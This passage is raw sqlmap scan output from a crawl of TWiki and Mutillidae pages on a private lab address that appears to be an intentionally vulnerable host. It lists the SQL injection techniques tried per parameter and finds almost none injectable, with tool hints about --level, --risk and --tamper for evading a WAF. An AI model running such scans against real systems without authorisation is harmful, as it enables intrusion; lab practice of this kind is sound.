[19:16:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:16:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:16:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:16:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:16:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:16:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:16:08] [INFO] testing 'MySQL inline queries' | |
[19:16:08] [INFO] testing 'PostgreSQL inline queries' | |
[19:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:16:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:16:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:16:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:16:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:16:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:16:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:16:11] [INFO] testing 'Oracle AND time-based blind' | |
[19:16:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:16:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:16:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:16:23] [WARNING] GET parameter 'rev' is not injectable | |
[19:16:23] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:16:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebNotify?rev1=1.7&rev2=1.6' | |
[19:16:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebNotify?rev=1.6' | |
URL 90: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebNotify?template=oopsmore¶m1=1.8¶m2=1.8 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:16:23] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebNotify?template=oopsmore¶m1=1.8¶m2=1.8' | |
[19:16:23] [INFO] testing connection to the target URL | |
[19:16:24] [INFO] testing if the target URL is stable | |
[19:16:25] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:16:25] [INFO] testing if GET parameter 'template' is dynamic | |
[19:16:25] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:16:25] [INFO] GET parameter 'template' is dynamic | |
[19:16:25] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:16:25] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:16:25] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:16:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:16:25] [INFO] heuristics detected web page charset 'ascii' | |
[19:16:25] [WARNING] reflective value(s) found and filtering out | |
[19:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:16:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:16:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:16:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:16:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:16:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:16:28] [INFO] testing 'MySQL inline queries' | |
[19:16:28] [INFO] testing 'PostgreSQL inline queries' | |
[19:16:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:16:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:16:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:16:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:16:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:16:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:16:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:16:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:16:30] [INFO] testing 'Oracle AND time-based blind' | |
[19:16:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:16:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:16:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:16:40] [WARNING] GET parameter 'template' is not injectable | |
[19:16:40] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:16:40] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:16:40] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:16:40] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:16:40] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:16:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:16:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:16:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:16:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:16:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:16:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:16:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:16:44] [INFO] testing 'MySQL inline queries' | |
[19:16:44] [INFO] testing 'PostgreSQL inline queries' | |
[19:16:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:16:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:16:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:16:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:16:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:16:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:16:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:16:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:16:47] [INFO] testing 'Oracle AND time-based blind' | |
[19:16:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:16:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:17:00] [WARNING] GET parameter 'param1' is not injectable | |
[19:17:00] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:17:00] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:17:00] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:17:00] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:17:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:17:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:17:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:17:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:17:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:17:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:17:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:17:04] [INFO] testing 'MySQL inline queries' | |
[19:17:04] [INFO] testing 'PostgreSQL inline queries' | |
[19:17:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:17:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:17:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:17:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:17:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:17:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:17:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:17:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:17:07] [INFO] testing 'Oracle AND time-based blind' | |
[19:17:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:17:14] [INFO] target URL appears to be UNION injectable with 1 columns | |
[19:17:14] [WARNING] applying generic concatenation with double pipes ('||') | |
[19:17:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[19:17:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:17:21] [WARNING] GET parameter 'param2' is not injectable | |
[19:17:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print&rev=1.19' | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.21' | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.21¶m2=1.19' | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=usage-instructions.php' | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=redirectandlog.php' | |
[19:17:21] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=credits.php' | |
URL 91: | |
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:17:21] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:17:21] [INFO] testing connection to the target URL | |
[19:17:22] [INFO] testing if the target URL is stable | |
[19:17:22] [INFO] target URL is stable | |
[19:17:22] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:17:22] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:17:22] [INFO] URI parameter '#1*' is dynamic | |
[19:17:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:17:23] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:17:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:17:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:17:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:17:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:17:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:17:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:17:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:17:26] [INFO] testing 'MySQL inline queries' | |
[19:17:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:17:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:17:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:17:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:17:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:17:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:17:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:17:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:17:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:17:30] [INFO] testing 'Oracle AND time-based blind' | |
[19:17:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:17:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:17:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:17:43] [WARNING] URI parameter '#1*' is not injectable | |
[19:17:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 92: | |
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:17:43] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:17:43] [INFO] testing connection to the target URL | |
[19:17:44] [INFO] testing if the target URL is stable | |
[19:17:45] [INFO] target URL is stable | |
[19:17:45] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:17:45] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:17:45] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:17:45] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:17:45] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:17:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:17:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:17:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:17:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:17:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:17:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:17:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:17:49] [INFO] testing 'MySQL inline queries' | |
[19:17:49] [INFO] testing 'PostgreSQL inline queries' | |
[19:17:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:17:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:17:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:17:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:17:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:17:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:17:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:17:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:17:53] [INFO] testing 'Oracle AND time-based blind' | |
[19:17:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:17:53] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:18:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:18:07] [WARNING] URI parameter '#1*' is not injectable | |
[19:18:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 93: | |
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:18:07] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:18:07] [INFO] testing connection to the target URL | |
[19:18:09] [INFO] testing if the target URL is stable | |
[19:18:09] [INFO] target URL is stable | |
[19:18:09] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:18:09] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:18:10] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:18:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:18:10] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:18:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:18:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:18:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:18:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:18:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:18:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:18:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:18:14] [INFO] testing 'MySQL inline queries' | |
[19:18:14] [INFO] testing 'PostgreSQL inline queries' | |
[19:18:15] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:18:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:18:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:18:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:18:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:18:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:18:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:18:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:18:19] [INFO] testing 'Oracle AND time-based blind' | |
[19:18:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:18:19] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:18:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:18:33] [WARNING] URI parameter '#1*' is not injectable | |
[19:18:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 94: | |
GET http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:18:33] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:18:33] [INFO] testing connection to the target URL | |
[19:18:34] [INFO] testing if the target URL is stable | |
[19:18:35] [INFO] target URL is stable | |
[19:18:35] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:18:35] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:18:35] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:18:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:18:35] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:18:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:18:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:18:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:18:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:18:39] [INFO] testing 'MySQL inline queries' | |
[19:18:39] [INFO] testing 'PostgreSQL inline queries' | |
[19:18:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:18:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:18:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:18:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:18:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:18:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:18:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:18:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:18:43] [INFO] testing 'Oracle AND time-based blind' | |
[19:18:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:18:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:18:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:18:57] [WARNING] URI parameter '#1*' is not injectable | |
[19:18:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 95: | |
GET http://192.168.1.113/twiki/bin/search/TWiki/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:18:57] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:18:57] [INFO] testing connection to the target URL | |
[19:18:59] [INFO] testing if the target URL is stable | |
[19:18:59] [INFO] target URL is stable | |
[19:18:59] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:18:59] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:19:00] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:19:00] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:19:00] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:19:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:19:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:19:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:19:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:19:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:19:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:19:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:19:03] [INFO] testing 'MySQL inline queries' | |
[19:19:03] [INFO] testing 'PostgreSQL inline queries' | |
[19:19:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:19:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:19:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:19:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:19:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:19:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:19:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:19:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:19:07] [INFO] testing 'Oracle AND time-based blind' | |
[19:19:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:19:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:19:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:19:22] [WARNING] URI parameter '#1*' is not injectable | |
[19:19:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 96: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebChanges?t=1441456979 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:19:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebChanges?t=1441456979' | |
[19:19:22] [INFO] testing connection to the target URL | |
[19:19:22] [INFO] testing if the target URL is stable | |
[19:19:23] [INFO] target URL is stable | |
[19:19:23] [INFO] testing if GET parameter 't' is dynamic | |
[19:19:23] [WARNING] GET parameter 't' does not appear dynamic | |
[19:19:23] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:19:23] [INFO] testing for SQL injection on GET parameter 't' | |
[19:19:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:19:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:19:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:19:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:19:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:19:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:19:26] [INFO] testing 'MySQL inline queries' | |
[19:19:26] [INFO] testing 'PostgreSQL inline queries' | |
[19:19:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:19:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:19:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:19:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:19:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:19:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:19:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:19:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:19:29] [INFO] testing 'Oracle AND time-based blind' | |
[19:19:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:19:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:19:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:19:42] [WARNING] GET parameter 't' is not injectable | |
[19:19:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 97: | |
